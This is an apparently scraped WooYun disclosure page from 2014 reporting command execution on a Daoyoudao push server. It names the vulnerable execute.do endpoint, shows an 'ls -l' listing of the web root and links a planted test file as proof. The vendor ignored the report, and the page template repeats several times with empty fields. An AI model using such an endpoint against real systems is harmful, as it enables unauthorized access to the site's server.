道有道某站命令执行3 | wooyun-2014-048024

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-048024

漏洞标题：

道有道某站命令执行3

漏洞详情

披露状态：

2014-01-06：细节已通知厂商并且等待厂商处理中
2014-01-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://push.daoyoudao.com/cms/upload/execute.do

-->>ls /usr/local/wwwadpush/
 -l
总用量 7672
-rw-r--r--   1 root root      11  1月  6 13:54 1.txt
-rw-r--r--   1 root root    2267 10月 17 18:04 aboutus_contact.jsp
-rw-r--r--   1 root root    3358 10月 17 18:04 aboutus.jsp
-rw-r--r--   1 root root    3114 10月 17 18:04 aboutus_tech.jsp
-rw-r--r--   1 root root    3152 2013-03-13  activity.jsp
-rw-r--r--   1 root root   19522 2012-01-31  adpush.docx
-rw-r--r--   1 root root   46371 2011-08-17  adpush.jar
-rw-r--r--   1 root root    4121 2013-03-06  aduser.jsp
-rw-r--r--   1 root root 2097152 10月 23 16:14 bbzs.zip
-rw-r--r--   1 root root  255643  9月 16 14:47 chaping.rar
drwxr-xr-x   3 root root    4096  8月  8 16:23 cms
drwxr-xr-x   3 root root    4096 11月 14 11:44 common
-rw-r--r--   1 root root    4628 2013-03-06  commonProblem.jsp
-rw-r--r--   1 root root    2107 10月 17 18:04 contents.jsp
-rw-r--r--   1 root root     336 2011-08-20  crossdomain.xml
-rw-r--r--   1 root root   18587 2012-01-31  dankead.docx
-rw-r--r--   1 root root 1081865 2013-05-20  danke.rar
drwxr-xr-x   6 root root    4096 10月 23 17:13 dev
-rw-r--r--   1 root root    8359 10月 17 18:04 developer.jsp
-rw-r--r--   1 root root    4741  9月 16 14:47 developers_rule.jsp
-rw-r--r--   1 root root    2812  7月 11 15:49 devusercommend.jsp
-rw-r--r--   1 root root    6947 2013-03-06  Dkdeveloper.jsp
drwxr-xr-x  10 root root    4096  8月  8 16:24 dl
drwxr-xr-x   3 root root    4096 11月 15 14:00 email
drwxr-xr-x   3 root root    4096  8月  8 16:24 error
-rw-r--r--   1 root root    1150 2012-04-10  favicon.ico
-rw-r--r--   1 root root    5539  9月 16 14:47 help.jsp
-rw-r--r--   1 root root  227538 10月 22 15:17 help.rar
drwxr-xr-x   5 root root    4096 11月 22 11:38 images
drwxr-xr-x   3 root root    4096  8月  8 16:26 img
-rw-r--r--   1 root root   11532 11月 22 14:41 index.jsp
-rw-r--r--   1 root root 1207232 11月  6 18:23 ios.zip
drwxr-xr-x   5 root root    4096  8月  8 16:26 ipushlogin
drwxr-xr-x   6 root root    4096 11月 19 17:45 js
-rw-r--r--   1 root root    1874 11月  8 15:31 loginCheckBB.jsp
-rw-r--r--   1 root root    7941 11月 19 17:33 login.jsp
drwxr-xr-x   3 root root    4096  8月  8 16:26 logo
-rw-r--r--   1 root root    1150 2011-09-06  logo.ico
-rw-r--r--   1 root root     850  9月 16 14:47 main.jsp
-rw-r--r--   1 root root    2130 2013-03-13  map.jsp
drwxr-xr-x   3 root root    4096  8月  8 16:26 META-INF
drwxr-xr-x   3 root root    4096 11月  5 16:18 mon
-rw-r--r--   1 root root    1736 10月 17 18:04 newsAction.jsp
-rw-r--r--   1 root root    3398 10月 17 18:04 news.jsp
-rw-r--r--   1 root root    8964 2013-04-17  pingbi.txt
-rw-r--r--   1 root root    7406 2013-03-06  policy.jsp
-rw-r--r--   1 root root    1731 2011-08-17  problems.jsp
-rw-r--r--   1 root root  561944  9月 16 14:47 push_danke.rar
drwxr-xr-x   3 root root    4096  8月  8 16:26 report
-rw-r--r--   1 root root  366244 10月 22 15:16 sdk.rar
-rw-r--r--   1 root root   10524  9月 16 14:47 serviceTerms.jsp
drwxr-xr-x   4 root root    4096  8月  8 16:27 style
drwxr-xr-x   7 root root    4096 2013-03-19  upload
drwxr-xr-x   3 root root    4096 10月 23 17:13 user
drwxr-xr-x   5 root root    4096  8月  8 16:41 WEB-INF
-rw-r--r--   1 root root 1572864 10月 22 15:52 梆梆助手-win32-v1.1_9.9_5.zip
-rw-r--r--   1 root root   55808 2013-01-31  道有道推送_SDK_V1.2.0.doc
-rw-r--r--   1 root root   19522 2012-01-31  道有道推送_SDK_V1.2.0.docx
-rw-r--r--   1 root root   18587 2013-01-31  道有道蛋壳_SDK_V1.0.0.docx

漏洞证明：

http://push.daoyoudao.com/1.txt

修复方案：

你会

版权声明：转载请注明来源 M4sk@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-01-11 14:54

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 M4sk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 M4sk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞